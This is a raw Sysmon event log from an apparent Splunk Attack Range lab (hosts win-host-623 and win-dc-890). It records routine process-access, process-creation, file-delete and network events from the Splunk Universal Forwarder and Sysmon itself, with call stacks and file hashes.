07:49:26.325{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807036Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:26.325{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807035Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:26.325{0C1E0330-048F-60E8-0500-00000000D001}412428C:\Windows\system32\csrss.exe{0C1E0330-F406-60EB-6179-00000000D001}3632C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000807034Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:26.309{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F406-60EB-6179-00000000D001}3632C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000807033Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:26.310{0C1E0330-F406-60EB-6179-00000000D001}3632C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000807077Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:27.825{0C1E0330-F407-60EB-6379-00000000D001}24521424C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807076Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:27.700{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F407-60EB-6379-00000000D001}2452C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807075Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:27.700{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807074Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:27.700{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807073Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:27.700{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807072Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:27.700{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807071Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:27.700{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807070Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:27.700{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807069Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:27.700{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807068Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:27.700{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807067Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:27.684{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807066Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:27.684{0C1E0330-048F-60E8-0500-00000000D001}412996C:\Windows\system32\csrss.exe{0C1E0330-F407-60EB-6379-00000000D001}2452C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000807065Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:27.684{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F407-60EB-6379-00000000D001}2452C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000807064Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:27.685{0C1E0330-F407-60EB-6379-00000000D001}2452C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000807063Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:27.575{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=37A3765D75864B3162D3CEA2F6EDC084,SHA256=1CF3EED13895FD355211773278CDE7C65CF3AB150D20D7FD5D3DA1DE693C3E30,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001047815Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:19.711{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local50987-false10.0.1.12-8000- 23542300x80000000000000001047814Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:27.128{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E6222E12166CBA5C70A7A351588EAF87,SHA256=185FBAAD7366C6F247E694EF39C850D933C12F1A41FAE19F408575007A474110,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000807062Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:25.348{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57228-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 10341000x8000000000000000807061Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:27.153{0C1E0330-F406-60EB-6279-00000000D001}40203180C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807060Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:27.013{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F406-60EB-6279-00000000D001}4020C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807059Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:27.013{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807058Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:27.013{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807057Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:27.013{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807056Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:27.013{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807055Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 